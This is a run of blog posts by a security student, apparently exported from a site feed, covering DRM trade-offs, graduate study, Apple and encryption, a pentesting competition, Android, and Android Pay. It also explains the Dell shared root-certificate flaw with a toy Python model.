<p>The topic of digital rights management (DRM) systems is a controversial one among those affected by it. Some readers are going to jump to conclusions without properly reading what I want to write on the matter, and there's nothing I can do about that. To those with minds open enough to read this entire blog post honestly, I promise to present you with a perspective that, although not novel to everyone, isn't a rehash of the most common arguments made on the topic. What I will argue is a stance based on my technical understanding of computer systems as an information security researcher, which I believe is a perspective many aren't exposed to. If by chance you happen to be such a researcher, you probably won't find this post particularly interesting. For everyone else, I hope to present a robust formulation of the problem that is insightful while still being easy to understand.</p>
<p>Additionally, as is necessary when discussing controversial topics, I must state that the contents of this post are my personal opinions and mine alone.</p>
<h2>Motivation</h2>
<p>DRM has become an active topic of debate in multiple communities due to recent changes in how technology allows us to access and experience digital content, such as movies, shows, games, and music. With the decline in users buying and storing their own digital content in favor of services (Netflix, Hulu, Steam, Spotify, etc.) that offer to stream it over the internet on demand, DRM touches more lives now than ever before.</p>
<p>For users of these services, the benefits of not having to think about storage and having cheap and immediate access to the latest content are very appealing. Try to access content from even a year ago, however, and the trade-off becomes apparent. These services may be cheaper, but they also don't guarantee lifetime access as licenses change and budgets require <a href="https://news.slashdot.org/story/16/10/12/2011240/netflix-now-only-has-31-movies-from-imdbs-top-250-list">money-saving cuts</a>. As some users have been frustrated to realize, there's a difference between paying to access and paying to own. Adding to the frustration is the inability to access content on some services when an internet connection is slow or unavailable.</p>
<p>The idea of using computers to illegally share digital content is not new to digital content services, but these services do give the act new motivation. Where users might have considered illegal sharing to avoid the cost of buying the digital content, now users seek to avoid subscription fees, ensure lifetime availability, and counteract limited internet connectivity. This motivates license holders to require services to implement DRM; systems designed to make it difficult for a user to permanently store and illegally share on-demand digital content.</p>
<p>However, I fear that many license holders demand these systems without actually realizing their limitations and unintended consequences. That is why in this blog post I would like to take the time to formulate the problem of using DRM to protect against illegal storing and sharing from the perspective of an information security researcher. Frankly, I think DRM is a losing battle and I want to present the reader with a robust formulation to justify why I see it that way.</p>
<h2>Cat and Mouse</h2>
<p>The first thing we have to understand is that DRM in practice cannot completely prevent illegal storage and sharing. Simply put, you can't show someone something without showing it to them and once they've seen it, you can't prevent them from having some ability to reproduce it. Even if you had a magic wand that could somehow wipe their memory, who's going to want what you have to share if they won't remember it? DRM cannot be perfect.</p>
<p>However, this is not to claim that DRM cannot be effective. Specifically, we can think of using DRM as making a trade-off between multiple factors: the cost of implementing the DRM and the inconvenience it presents to the benign user, versus the time and skill required for the adversarial user to bypass it. In other words, an effective DRM system is one that is cheap to implement, produces few enough side effects that the benign user is still willing to pay for the service, and requires the adversarial user to commit a lot of time and skill to bypass.</p>
<p>So keep the good, throw out the bad, and we're done, right? Not so fast. We could do just that if the factors had no relationship to each other, if they were independent, but they aren't. Anything you do to make the adversarial user's task harder is going to increase the cost of implementation and inconvenience the benign user. Don't believe me? Implementing software DRM restricts the benign user to only systems that can run that software and allows the adversarial user to bypass the DRM using their own software. Operating system DRM now requires the adversarial user to implement their own operating system software, but also now restricts which operating systems the benign user can use. Hardware DRM raises the bar further by requiring the adversarial user to devise a hardware-level bypass, but now the benign user can only use certain hardware. Hopefully you can see how this is a game of cat and mouse. The harder you make it for an adversarial user to bypass the DRM, the more restrictive the benign user's experience becomes. Similarly, as you increase the skill the adversarial user needs to bypass the DRM, you also raise the skill the programmer implementing the DRM needs to design it, which raises the cost. Basically, as you make the DRM better at thwarting the adversarial user, you also make the service more expensive and less appealing to the benign user.</p>
<p>Hopefully you now see why balancing the factors I've pointed out is not trivial. The next question is how hard it is to find this optimal balance. If it's easy, we can just find it and we're done. We'd then know what degree of DRM to implement.</p>
<p>Sadly, I'm going to argue that it's not easy to find. In fact, finding it is difficult because it's subjective and constantly changing! Notice that all the factors I defined are very soft. User experience is hard to measure. The user's tolerance for being inconvenienced is hard to measure. Even skill and cost are hard to measure in this context. Not only that, but these factors change over the course of public discussion. Opinions simply change. What all this means for us is that it's difficult to measure the factors we're interested in, it's difficult to determine when we've struck an optimal balance, and even if we strike a balance, it might not stay balanced for very long. In other words, our best efforts will be no better than a random guess. Sure, we might get lucky, but why pay to play in the first place?</p>
<h2>Two Extra Cents</h2>
<p>In general, I find it interesting to argue that people are blinded by an unjustified pressure to achieve progress. That's not to claim that we never take steps in the right direction, but rather that when the path becomes too foggy, we tend to start taking random steps and then spend a lot of effort convincing ourselves that the steps somehow weren't random. It's worth pondering whether a solution has fallen into this pattern, because when it has, the result is a lot of effort spent on something that doesn't actually solve the intended problem.</p>Demystifying the Master’s Thesis — Is it right for you?2016-04-21T22:30:00-04:002016-04-21T22:30:00-04:00Carter Yagemanntag:carteryagemann.com,2016-04-21:/demystifying-the-masters-thesis.html<p><em>Originally written for the Syracuse University College of Engineering blog.</em></p>
<p>A few weeks ago I successfully defended my master’s thesis. At 55 pages long, it summarizes my research findings from two years spent in Professor Kevin Du’s lab studying the security of the Android operating system. With its acceptance, I receive the last six credits needed to complete my degree. It was a long and intense process, and honestly, there are easier ways to earn credits.</p>
<p>Depending on your program, a thesis isn’t always a requirement. Many students opt for their program’s non-thesis track. So, how do you know if completing a thesis is right for you?</p>
<p>Let’s start by defining it. A master’s thesis is a cumulative work summarizing a student’s independent research on a specific topic related to their major. In my case, that topic was the security and privacy of Android intent inter-process communication. Translation—how do applications in an Android device share messages between one another and what features can we add to protect their “conversation?”</p>
<p>Thesis work is overseen by a research advisor, a professor who provides feedback and direction. Ultimately, it is the student’s responsibility to find a topic and perform the study on their own. Depending on the field of research, it will generally take a student one or two years to finish writing their master’s thesis. This makes prior planning essential to ensure that the thesis will be completed in time for graduation.</p>
<p>Once the thesis is complete and the advisor is satisfied with the work, the student has to defend it in front of a committee of four faculty members. The defense consists of a 20-minute presentation followed by questions. It takes about an hour. Once complete, the members convene privately to decide the outcome of the defense. A thesis can either be accepted, accepted with minor revision, accepted with major revision, or rejected. Thankfully, rejections are rare when the student follows their advisor’s guidance.</p>
<p>Once the thesis is accepted and any revisions are made, it’s sent off for publication and will usually be printed and placed in the university’s library. Most departments give their thesis students three to six elective credits depending on how much time went into creating the thesis.</p>
<p>So that’s all the gritty detail of how a master’s thesis works, but why do one in the first place? If your objective is to get your degree and go directly into industry as efficiently as possible, a thesis probably isn’t for you. It’s much safer to take classes to get those elective credits, and most employers value time spent in internships more. The student who should consider a thesis is one who is interested in gaining exposure to research. I could write at great length about the difference between being an engineer and being a researcher, but suffice it to say, the open-endedness makes research a very different ballgame. A master’s thesis is a great opportunity to test the waters and see if that’s the kind of career you want to pursue. If you go for it, it opens the door to pursue a doctorate. If not, the door to industry will certainly be open to someone with your qualifications and research.</p>
<p>As with anything, it’s important to make the choice that is right for you. For me, the extra effort was well worth it. This fall I’ll be a doctorate student at Georgia Tech—a goal I am very proud to achieve. My experience completing my thesis at Syracuse University’s College of Engineering and Computer Science and in Professor Du’s lab has given me the confidence to take another leap into computer science research.</p>
<h3>About The Author</h3>
<p>Carter Yagemann ’15 is a master’s student studying computer science in Syracuse University’s College of Engineering and Computer Science. A research assistant in Professor Kevin Du’s Android security lab, his interests include mobile security and security education. He explores problems such as how to ensure security and privacy in Android inter-component communication. Yagemann is a student member of ACM and IEEE and competes in cybersecurity competitions with the Information Security Club in Syracuse University’s School of Information Studies (iSchool).</p>Apple’s Balancing Act—Yesterday, Today, and Tomorrow2016-04-01T22:30:00-04:002016-04-01T22:30:00-04:00Carter Yagemanntag:carteryagemann.com,2016-04-01:/apple-yesterday-today-tomorrow.html<p><em>Originally written for the Syracuse University College of Engineering blog.</em></p>
<p>A few months ago I read <a href="http://www.orbooks.com/catalog/splinternet-by-scott-malcomson/">Splinternet</a> by Scott Malcomson. It recounts the early days of the internet and personal computing. One section in particular caught my attention—a quote taken from an abandoned Apple ad campaign:</p>
<blockquote>
<p>"There are monster computers lurking in big business and big government that know everything from what motels you’ve stayed at to how much money you have in the bank. But at Apple we’re trying to balance the scales by giving individuals the kind of computer power once reserved for corporations."</p>
</blockquote>
<p>This quote is from 1984, and yet it could just as easily be mistaken for something said in 2016 given today’s controversies. I find it provocative for two reasons.</p>
<p>First, three decades later the issues raised in this marketing pitch are still relevant. Today, we struggle to decide how to handle technology that knows our very location, companies that track our browsing behavior via web cookies, and governments that make lethal decisions based on metadata. On one hand, it’s frustrating to see how little progress we’ve made in solving issues like these, but on the other it’s comforting to know that problems like these aren’t new and we’ve survived to this point in spite of them. I’m optimistic that as these issues grow to affect our lives in more significant ways, we’ll accelerate our efforts to resolve them.</p>
<p>Second, look at how much Apple has changed in three decades. Look at how they’ve gone from being the underdog, liberating the masses from the chains of the IBM mainframes, only to become a massive conglomerate themselves. Modern Apple has appealing products for sure, but make no mistake: what they offer is a closed ecosystem where the customer is expected to run Apple software on top of Apple hardware. In the pursuit of perfecting the user experience, Apple has created a walled garden that takes control of their products away from the consumer. This is a stark contrast to the Apple that once made the analogy of the personal computer being a bicycle for the mind.</p>
<p>All that said, perhaps the Apple of tomorrow will strike a new balance between these two Apples I’ve mentioned. We’ve seen in recent months Apple’s commitment to resisting the FBI’s request for aid in unlocking encrypted iPhones. We might even see future iterations of the smartphone implement new security features that even Apple won’t be able to bypass. Only time will tell how the second act of this ongoing story will play out, but I’m excited to watch it develop.</p>
Apple vs. the FBI2016-02-22T22:30:00-05:002016-02-22T22:30:00-05:00Carter Yagemanntag:carteryagemann.com,2016-02-22:/apple-vs-fbi.html<p><em>Originally written for the Syracuse University College of Engineering blog.</em></p>
<p>In the wake of the tragic shooting in San Bernardino, many questions remain and people want answers. It seemed like a breakthrough in the investigation was imminent when the FBI got their hands on an iPhone belonging to one of the shooters, only to be thwarted by the discovery that the device was encrypted and password-protected. Ten wrong guesses and the device will wipe itself clean, including all the precious data within.</p>
<p>In light of the situation, a judge officially ordered Apple to aid the FBI in unlocking the iPhone. However, Apple has announced that they refuse to comply. Not only that, but Google has also announced that they support Apple’s decision to challenge the judge’s ruling. Why are two major tech companies reluctant to aid in an investigation? The problem has nothing to do with the technology, but rather the societal consequences such aid would bring.</p>
<p>In order for Apple to unlock the shooter’s device, they would have to circumvent the security mechanisms of their own device. This same technique could then be applied to any iPhone in the world. If Apple created such a capability and put it to use in this case, who’s to say they would never use it again? Allowing such a power to exist would create a precedent that would undermine their customers’ trust in all of Apple’s products. And this distrust could radiate outwards to other tech companies like Google and Microsoft, which could likewise do the same.</p>
<p>But the consequences wouldn’t only be to Apple’s profit margin. Encryption levels the playing field between the mighty and the weak. The same encryption that is thwarting the FBI’s investigation is simultaneously allowing citizens who live under oppressive regimes to circumvent country-wide censorship while avoiding unjust prosecution. Betray these users’ trust with this new precedent, take away their means of broadcasting their voice, and the whole world becomes a darker place.</p>
<p>The root of this problem is not one we are unfamiliar with. Time and time again, we face the question of whether it is worth taking something away from everyone in order to prevent a few from abusing it. The answer depends on the details, and in this case I side with Apple in saying that they should not comply with this order. Compliance would not only hurt American citizens and American companies, it would hurt every citizen of every country. We cannot allow tragedy to drive us towards oppression. We must maintain transparency for the strong and encryption for the weak.</p>SU Senior Carter Yagemann’s Summer of Android2016-02-22T22:30:00-05:002016-02-22T22:30:00-05:00Carter Yagemanntag:carteryagemann.com,2016-02-22:/summer-of-android.html<p><em>Originally written for the Syracuse University College of Engineering blog.</em></p>
<p>This summer, Carter Yagemann, a rising senior in the Computer Science program from Jupiter, Florida, spent his time crawling the Android operating system as part of the Department of Electrical Engineering and Computer Science’s Research Experience for Undergraduates (REU) program. Carter investigated Android security using “an intent firewall” to protect users’ information on smartphones and tablets. We caught up with him following the final presentation of his research to a room of faculty and students at Syracuse University.</p>
<p><strong>How did you learn about the REU program?</strong></p>
<p>I was actually a student in one of Professor Du’s classes, and I had been doing internships in the private sector. I started as a web developer for Frontier Communications and then I worked for JPMorgan Chase in some of their security areas. I wanted to gain as much exposure as I could, so I was interested in getting into research. I approached Professor Du and he gave me an offer to do research under him.</p>
<p><strong>What has this experience been like?</strong></p>
<p>It’s been a lot of fun. It’s been nice to pursue what I’m interested in. There’s a lot less red tape and hurdles when you’re doing research versus in the private sector where there is a lot of regulation and accountability. It was really fun, really educational. I get to be with my peers, people more my age. I can mostly do what I want.</p>
<p>One of the things that is very different with research is that it’s very open ended. You don’t really know what’s going to get traction and what’s going to turn out to be impossible. It’s very free flowing and very flexible. The professors give you some ideas of where to start and you go from there to see if it works or not.</p>
<p>Professor Du was definitely interested in the intent firewall, but most of my research is my own work. I made all of the documentation and the website. I’m the one who crawled all the source code. He was the one who gave me the idea and I took off with it.</p>
<p><strong>Why did you choose to come to Syracuse University?</strong></p>
<p>I was choosing between here and Drexel University and I wasn’t sure that I wanted to be in a big city like Philadelphia. I picked Syracuse because there’s a nice atmosphere here. It’s a condensed campus, and there’s a lot going on. It’s a nice place to be.</p>
<p><strong>What else are you involved in at SU?</strong></p>
<p>I like everything about programming, so I do some hack-a-thons at the Student Sandbox at the Tech Garden in Downtown Syracuse. I have a few friends from the iSchool who often get together to do little things. Freshman year we created a platform called BeerText. The idea was you could text the name of a beer to a certain number and it would send you back a text with a description of the beer. It was really cool. It went viral on Twitter and Reddit. We got 35,000 users in 48 hours.</p>
<p><strong>What do you plan to do with your degree in Computer Science after you graduate?</strong></p>
<p>I definitely want to continue to pursue cybersecurity. Right now I am looking in multiple places. I’m looking at what’s going on out in Silicon Valley and what’s going on with the government.</p>
<p>I am also interested in being an entrepreneur. I have started writing some applications and I have pushed some out to the Google Play Store. I’m kind of a one-man app dev company. I’m definitely interested in getting out there on my own or with friends and talented people. On the other hand, large companies tend to have the resources to be able to do some pretty interesting things.</p>
<p>I just want to go where the interesting work is – something I haven’t seen before. I’m really open. Part of the point of this research was to try to find where I’m happiest.</p>
<h2>About the Electrical Engineering and Computer Science REU</h2>
<p>The Department of Electrical Engineering and Computer Science hosted its annual Research Experience for Undergraduates (REU) program this summer. It culminated with a half-day of presentations in July in which seven REU students from four different universities (SU, Cornell, SUNY Fredonia, and the University of Illinois at Urbana-Champaign) presented research on a range of topics. The predominant theme was the development and security of the Android operating system.</p>
<p>Over the course of the summer, students worked with an advisor to select a topic that interested them and advanced the College’s research, then immersed themselves in their chosen subjects. The experience is educational for the students and the advisors alike.</p>
<p>“There are expectations that we are researching and getting something out of this experience. The first thing we are asked is what we want to work on, then our advisor helps us develop research questions from that,” says Jonathan Secora, a computer science major at SU who focused on animations on the Android platform this summer.</p>
<p>Kevin Du, Professor of Computer Science, advised the students who focused on Android devices, including:</p>
<ul>
<li><strong>Gabrielle George</strong>, “A Drinking From the Fire Hydrant Approach to Learning Computer Science”</li>
<li><strong>Jonathan Secora</strong>, “Animation and Application in Android”</li>
<li><strong>Curtis Robinson</strong>, “A Short Survey of Android”</li>
<li><strong>Jason Davison</strong>, “Communication Problems with the Android System”</li>
<li><strong>Carter Yagemann</strong>, “Intent Firewall – Android Security via Intent Filtering”</li>
</ul>
<p>Fred Schlereth, Associate Research Professor of Electrical Engineering, advised Tom McLeod as he examined “Trapping of Molecules Inside Non-Ideal Nanoscale Channels.”</p>
<p>Current Computer Science Ph.D. student Paul Rattazi advised Wesley Brooks at AFRL on “Self-Protecting Apps: Helping Developers Protect Your Sensitive Data.”</p>How Orange Helps You Sleep At Night2016-02-04T22:30:00-05:002016-02-04T22:30:00-05:00Carter Yagemanntag:carteryagemann.com,2016-02-04:/how-orange-helps-you-sleep-at-night.html<p><em>Originally written for the Syracuse University College of Engineering blog.</em></p>
<p>Everyone at Syracuse University knows that orange is the very best college color, but who knew it could also help you sleep? <a href="http://www.pnas.org/content/112/4/1232.full.pdf">Research conducted in recent years</a> has shown that sleep problems are on the rise, and one theory gaining momentum points to our electronics as the cause. Studies find that the abundance of blue light produced by our smartphones, tablets, and computer screens has a tangible impact on the chemistry in our bodies that regulates when to wake up and when to go to sleep. This isn’t a problem during the day, when the sun naturally produces its own blue light, but staring at our own personal mini sun before bed can make falling asleep much more difficult.</p>
<p>So what can we do about it? We could restrict ourselves from staring at screens an hour before bedtime, but the world is a busy place and our nighttime reading isn't always ink on paper. Instead, programmers are experimenting with software that reduces the level of blue light our screens produce after sunset. As the sun goes down, the screen shifts from a bluish glow to an orange tint and then back to blue with the following sunrise, promising a better night’s sleep for those of us who are unable (or unwilling) to give up our screens at night. This software is already publicly available for computers thanks to groups like <a href="https://justgetflux.com/">f.lux</a>, but availability on mobile devices is limited.</p>
<p>Luckily, the big companies have taken notice and are taking action. <a href="http://www.apple.com/ios/preview/">In an upcoming version of iOS for iPhones and iPads</a>, Apple plans to introduce Night Shift. Flip it on and it'll automatically determine when the sun sets and rises in your area and adjust the screen's color accordingly. Just another reason to GO ORANGE.</p>
Understanding Dell’s Root Certificate Problem2015-11-30T22:30:00-05:002015-11-30T22:30:00-05:00Carter Yagemanntag:carteryagemann.com,2015-11-30:/dell-root-certificate.html<p><em>Originally written for the Syracuse University College of Engineering blog.</em></p>
<p><a href="http://www.theregister.co.uk/2015/11/23/dude_youre_getting_pwned/">A recent discovery in the security community</a> has researchers concerned about Dell devices. Some of these devices have been found to contain what is known as a self-signed root certificate. Installed by the manufacturer for advertising purposes, these certificates pose a risk to users. This is not the first time this has happened; there was <a href="http://www.cnet.com/news/superfish-torments-lenovo-owners-with-more-than-adware/">an earlier case involving Lenovo devices</a> known as Superfish. In this article I will try to explain the problem in an approachable manner as well as point readers toward actions they can take to protect themselves.</p>
<p>What are these self-signed root certificates the security experts talk about, and why are they dangerous? Understanding the problem requires understanding some of the characteristics of the public key infrastructure (PKI). PKI is complex in practice, but we can use a simplified model to understand the problem at hand. All we need to know is that there are keys and certificates. By using a key, one can create certificates. If we trust the party who holds a particular key, then we can trust the certificates made from that key. Trust, in this case, implies two fundamental assumptions. First, that the party that holds the key will keep that key secret. Second, that the party will only make certificates for other trustworthy parties. This is the network of trust upon which we perform our sensitive internet tasks such as banking, shopping, and communicating.</p>
<p>The problem with the Dell root certificate and Superfish is that the manufacturer has created a "trusted" key which sits on every user's device. The same key. This breaks the first assumption: a key copied onto every device cannot be kept secret. Steal this key from any one device and the thief can create certificates that will be trusted by all devices. Google, Facebook, Bank of America, Amazon: all of these parties can be impersonated by creating new certificates.</p>
<p>Exposing users to such a risk is a severe oversight. Thankfully, the concerns of the security community have been heard and users can now take actions to remove these self-signed root certificates. If you use a Dell or Lenovo device, I encourage you to consult your manufacturer's website for more details:</p>
<ul>
<li><a href="http://www.dell.com/support/article/us/en/04/SLN300321?c=us&l=en&s=bsd&cs=04">Dell Support</a></li>
<li><a href="https://support.lenovo.com/us/en/product_security/superfish_uninstall">Lenovo Support</a></li>
</ul>
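<p>To make the simplified model above concrete, here is a toy sketch in Python. It is an illustration under stated assumptions, not how Dell, Lenovo, or any real TLS library works: HMAC-SHA256 stands in for a public-key signature, a "certificate" is just a domain name plus a tag, and the names <code>issue_certificate</code>, <code>Device</code>, and <code>bank.example</code> are hypothetical. Because in the Dell and Superfish cases the signing key itself shipped on each machine, every toy device here holds that key directly.</p>

```python
import hashlib
import hmac
import secrets

# Toy model only: HMAC-SHA256 stands in for a real public-key signature.
# A "certificate" is (domain, tag), where the tag is computed with the root key.
Certificate = tuple[str, bytes]


def issue_certificate(root_key: bytes, domain: str) -> Certificate:
    """Anyone holding root_key can mint a certificate for any domain."""
    tag = hmac.new(root_key, domain.encode(), hashlib.sha256).digest()
    return domain, tag


class Device:
    """Hypothetical device that trusts certificates made with its root key."""

    def __init__(self, trusted_root_key: bytes):
        # Mirrors the flaw: the signing key itself sits on the device.
        self.trusted_root_key = trusted_root_key

    def trusts(self, cert: Certificate) -> bool:
        domain, tag = cert
        expected = hmac.new(self.trusted_root_key, domain.encode(),
                            hashlib.sha256).digest()
        return hmac.compare_digest(tag, expected)


# The manufacturer ships the SAME root key to every device.
MANUFACTURER_KEY = secrets.token_bytes(32)
devices = [Device(MANUFACTURER_KEY) for _ in range(3)]

# An attacker extracts the key from just one device...
stolen_key = devices[0].trusted_root_key

# ...and mints a certificate for a site they do not control.
forged = issue_certificate(stolen_key, "bank.example")
print([d.trusts(forged) for d in devices])  # [True, True, True]

# A device that was given its own unique key is not fooled.
independent = Device(secrets.token_bytes(32))
print(independent.trusts(forged))  # False
```

<p>One key pulled from one machine is enough to produce a certificate that every machine sharing that key accepts, which is why the fix is to remove the shared root certificate rather than to guard any single device more carefully.</p>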
Students Compete in RIT Cybersecurity Competition2015-11-11T22:30:00-05:002015-11-11T22:30:00-05:00Carter Yagemanntag:carteryagemann.com,2015-11-11:/rit-cybersecurity-competition.html<p><em>Originally written for the Syracuse University College of Engineering blog.</em></p>
<p>Last weekend, I had the opportunity to compete in the first-ever Collegiate Pentesting Competition along with five other members of the iSchool's Information Security Club. Hosted by RIT, this competition places university teams in the role of security consulting companies contracted to assess the strength of a corporate network. The competition stresses both technical and soft skills. Competitors must leverage their technical abilities to find vulnerabilities, as well as document and present their findings to the nontechnical executive board of the corporation. I am excited to announce that out of the nine university teams that competed from across the Northeast, Syracuse University took third place!</p>
<p>The Collegiate Pentesting Competition distinguishes itself from other cybersecurity competitions by placing a heavy emphasis on the business side of running a security company. Traditionally, security competitions fall into two categories: purely defensive or purely offensive. Purely defensive competitions, such as the Collegiate Cyber Defense Competition, restrict competitors to solely defending a network while a professional team of hackers tries to exploit vulnerabilities to gain access. This type of competition forbids any offensive actions on the part of the competing students. Conversely, purely offensive competitions, such as Capture The Flag events, present competitors with tasks that must be completed by breaking into vulnerable computer systems. Since the sole objective of these competitions is to recover the “flags,” competitors are encouraged to use any offensive tactics possible with complete disregard for collateral damage. In these competitions, the systems and networks often get destroyed as teams race to complete the given tasks.</p>
<p>The Collegiate Pentesting Competition is a hybrid between offense and defense. Teams still use offensive techniques to detect and exploit vulnerable systems, but they must do so in a way that does not damage the systems or hinder the company's ability to do business. This requires the teams to be surgical in their methodology rather than simply “smashing and grabbing.”</p>
<p>Overall, I thoroughly enjoyed this competition. The level of realism and professionalism it entailed made competing a very educational experience. I look forward to seeing the Information Security Club compete next year.</p>
<h3>About The Author</h3>
<p>Carter Yagemann ’15 is a master’s student studying computer science in Syracuse University’s College of Engineering and Computer Science. A research assistant in Professor Kevin Du’s Android security lab, he is interested in mobile security and security education. He explores problems such as how to ensure security and privacy in Android inter-component communication. Yagemann is a student member of ACM and IEEE and competes in cybersecurity competitions with the Information Security Club in Syracuse University’s School of Information Studies (iSchool).</p>Android for Your Laptop2015-11-03T22:30:00-05:002015-11-03T22:30:00-05:00Carter Yagemanntag:carteryagemann.com,2015-11-03:/android-for-your-laptop.html<p><em>Originally written for the Syracuse University College of Engineering blog.</em></p>
<p>Google recently announced plans to merge features from Chrome OS into Android to make the operating system suitable for use with laptops. This means that in the future, we can anticipate Android working across phones, tablets, and laptops. This is a very bold vision, but it's one that was bound to happen and one that all Android users should be excited about.</p>
<p>Up to this point, Chrome OS has been Google's dedicated operating system for its lineup of Chromebook computers. While Chrome OS offers unique features in terms of user experience and security at a price point that beats most other laptops on the market, Google's substantially different approach to designing laptops has made the Chromebook a relatively niche device. In the years it has existed, it has never become a real competitor in the Windows-dominated laptop market. Contrast this with Android, which dominates the smartphone market with over 80 percent market share, and the reasoning behind merging the two operating systems becomes clear. If Google can successfully port its winning mobile user experience to laptops, it will have a formula for a laptop that stands toe-to-toe with Windows and OS X. I think this is going to be the Google operating system that gives Microsoft and Apple a run for their money.</p>
<p>Users should be excited about this move as well. The average user now owns more devices than ever before and wants a consistent experience regardless of whether they're using a phone, tablet, laptop, or desktop. Google does an excellent job of making the interaction between the user and the device clean, efficient, and friendly, and soon we'll get these same benefits on the laptop.</p>
<p>However, there are a handful of design challenges that Google will have to overcome if it wants Android for the laptop to be a success and not just another niche product like Chrome OS. For starters, laptops are predominantly used for content creation, whereas mobile devices are mostly used for consumption. Laptops are like the working man's pickup truck: users have different demands for them than for mobile devices. If Android is to succeed in the laptop environment, a greater emphasis will have to be placed on productivity. This means efficient switching between applications, strong keyboard support, and plug-and-play functionality for external storage and other peripherals, all of which current Android supports only to a limited degree.</p>
<p>Screen size also becomes an issue for Android on laptops. Android's current interfaces are designed for relatively small screens, under 10 inches in size. Now that Google wants Android to run on laptops and desktops, it will have to redesign the look and feel for screens in excess of 16 inches. It may only be a few extra inches, but this makes a huge difference if you don't want the screen to appear barren.</p>
<p>For the average user who already uses Android on their mobile devices, I think the transition to Android for laptops will be pretty smooth. Android already has the email clients, web browsers, and office applications these users need for their everyday work. For the "power user," however, I think the new operating system will be a harder sell. These users manage corporate infrastructure, develop software, automate systems, deploy virtual machines, and regularly perform computing-intensive tasks. Unfortunately for them, the tools they need simply don't exist on Android yet.</p>
<p>I've anticipated Android moving to laptops and desktops for some time now, and I hope others share my excitement over this recent announcement. There's a lot of work to be done, but I think that if Google can pull this off, we'll end up with something very special and unique.</p>
<h3>About The Author</h3>
<p>Carter Yagemann '15 is a master's student studying computer science in Syracuse University's College of Engineering and Computer Science. A research assistant in Professor Kevin Du's Android security lab, he is interested in mobile security and security education. He explores problems such as how to ensure security and privacy in Android inter-component communication. Yagemann is a student member of ACM and IEEE and competes in cybersecurity competitions with the Information Security Club in Syracuse University's School of Information Studies (iSchool).</p>Initial Observations Regarding Android Pay2015-10-30T22:30:00-04:002015-10-30T22:30:00-04:00Carter Yagemanntag:carteryagemann.com,2015-10-30:/android-pay.html<p>Android Pay has just come out on the Google Play Store, and it's an interesting concept in many ways. I can't help but be curious about its internal workings, and after some discussion with a co-worker, I've decided to quickly write up our initial thoughts on the application.</p>
<h2>Scope</h2>
<p>These are some initial thoughts I had from a security perspective after using Android Pay for the first time. They are purely speculative and based only on black-box observation, so they should not be mistaken for fact. I made them before doing any decompilation or reverse engineering. Throughout this post, I will try my best to clearly state the observations driving each speculation I make.</p>
<h2>Transparency</h2>
<p>The first thing that stuck out to me is that Android Pay does not appear to be transparent to the banks. When I added my debit card to the application, for example, I was presented with an EULA from my particular bank. After that, I had to verify my card by signing into my bank's application. In the case of my co-worker, he didn't have to verify his card, but he did receive an email from his bank within minutes containing information about Android Pay. In other words, while I don't know exactly how the Android Pay system works, I speculate that it requires the banks to be aware of Android Pay. You'll see why this is important in the next speculation.</p>
<h2>Virtual Account Number</h2>
<p>The other thing that immediately stuck out to me is that upon adding a card to Android Pay, that card is given a "virtual account number." The in-app description of this number reads, "This number is used instead of your actual card number so that your info isn't shared with stores."</p>
<p>Interesting.</p>
<p>While privacy may indeed be part of the motivation for using a virtual number instead of the real card number, I don't believe it is the full story. Having worked in a bank for a short while, I know that one of a bank's biggest concerns is liability and, therefore, risk management. As we speculated earlier, Android Pay isn't transparent to the banks. This means that the banks have a choice about participating, which in turn means that they won't participate unless the risks associated with Android Pay are minimal. I speculate this to be the <strong>true</strong> reason for the virtual number. By using it in place of the real card number, should a vulnerability in Android Pay be exploited, the damage is limited to exposure of the virtual number and not the real one. Google can reissue the virtual number while the bank is spared from having to issue a new card. Granted, a fraudulent transaction or two may occur in the time it takes for the virtual number to be deactivated and reissued, but the majority of the burden falls on Google and not the bank. It's even possible that the banks have an agreement with Google under which Google is responsible for repaying the banks for fraudulent charges that occur due to Android Pay.</p>
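<p>To make the risk argument concrete, here is a minimal Python sketch of the kind of mapping I'm speculating about. Everything in it is hypothetical: the TokenVault class, its method names, and the 16-digit number format are my own illustrative assumptions, not how Android Pay, Google, or any bank actually implements this. The only point it demonstrates is that a leaked virtual number can be revoked and replaced while the real card number never changes.</p>

```python
import secrets
from typing import Dict, Optional, Set


class TokenVault:
    """Hypothetical mapping from virtual account numbers to real card numbers.

    Illustrative only: it models the speculation that a leaked virtual number
    can be revoked and reissued without touching the real card number.
    """

    def __init__(self) -> None:
        self._real_by_virtual: Dict[str, str] = {}
        self._revoked: Set[str] = set()

    def issue(self, real_number: str) -> str:
        """Create a fresh random 16-digit virtual number for a real card."""
        while True:
            virtual = "".join(secrets.choice("0123456789") for _ in range(16))
            # Never hand out a number that is in use or was previously revoked.
            if virtual not in self._real_by_virtual and virtual not in self._revoked:
                break
        self._real_by_virtual[virtual] = real_number
        return virtual

    def reissue(self, compromised: str) -> str:
        """Deactivate a leaked virtual number and issue a new one for the same card."""
        real_number = self._real_by_virtual.pop(compromised)
        self._revoked.add(compromised)
        return self.issue(real_number)

    def resolve(self, virtual: str) -> Optional[str]:
        """Translate a virtual number; only whoever holds the vault can do this."""
        return self._real_by_virtual.get(virtual)


# Usage: 4111111111111111 is a widely used test card number, not a real account.
vault = TokenVault()
leaked = vault.issue("4111111111111111")
replacement = vault.reissue(leaked)
print(vault.resolve(leaked))       # None: the leaked number no longer works
print(vault.resolve(replacement))  # 4111111111111111: same card, new virtual number
```

<p>Note that the real card number appears only inside the vault; the party holding the vault bears the cost of reissuing, which is the burden-shifting I'm speculating about.</p>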
<p>This idea of risk mitigation will come up again in a later speculation I make.</p>
<h2>Transaction Processing</h2>
<p>The ultimate question my speculations aim to shed light on is this: how does Android Pay work? What happens when a user makes a purchase using Android Pay? Given the previous two speculations, we can make some educated guesses. I must stress again that this is still speculation, but it is food for thought nonetheless.</p>
<p>Before I reveal my next speculation, a bit of background is necessary. In card processing, time is very much of the essence. A transaction must be processed in a matter of seconds for the customer to be satisfied, and in those few seconds it has to pass through multiple parties. In the case of a traditional card, there's the point-of-sale terminal that swipes the card, some back-end system for managing these terminals, the credit card processor (such as Visa), and the bank (such as JPMorgan Chase). The transaction has to pass through all of these parties in order to be approved.</p>
<p>With that understood, I tease my next speculation with a question: Who translates the virtual number into the real number? Surely this translation must happen somewhere, otherwise why would the Android Pay user provide a credit or debit card number in the first place? I speculate that it isn't Google.</p>
<p>Think about it. If Google were translating the virtual number into the real number at the time of use, the process would be transparent to the banks, and there would be no reason for Google to solicit partnerships with them. But we know Android Pay isn't transparent to the banks, which is a strong reason to speculate that this is not the case. Instead, Google likely shares the virtual number with the bank at some point while the card is being added or verified.</p>
